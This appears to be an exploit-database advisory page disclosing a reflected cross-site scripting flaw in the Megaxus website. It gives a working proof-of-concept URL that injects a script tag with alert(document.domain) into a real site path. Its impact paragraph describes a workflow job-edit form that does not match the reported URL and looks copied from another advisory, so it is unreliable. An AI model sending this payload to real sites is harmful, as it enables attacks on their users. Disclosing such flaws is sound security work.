Megaxus Reflectied XSS

2019.02.03

abay (ID)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title : Reflectied XSS in Megaxus
# Author : Mukhammad Akbar // https://abaykan.com
# Author Contact : abay.kan2301@gmail.com
# Tested On : Windows and Mac OS
# Category : WebApps
# Exploit Risk : Medium



# Impact :
*********

Cross-Site Scripting issues affecting multiple fields in the workflow module under job edit form by injecting javascript code in the Arguments, Invocation String, and File Extension field, the input from these fields are rendered in the Execution Preview which is the sink of this vulnerability.



# Reflectied XSS :
****************************

http://www.megaxus.com/olimpiade/report/megaxus-olimpiade_{{payload_here}}-2010
http://www.megaxus.com/olimpiade/report/megaxus-olimpiade_</script><script>alert(document.domain)</script>-2010

References:

https://abaykan.com

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Megaxus Reflectied XSS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.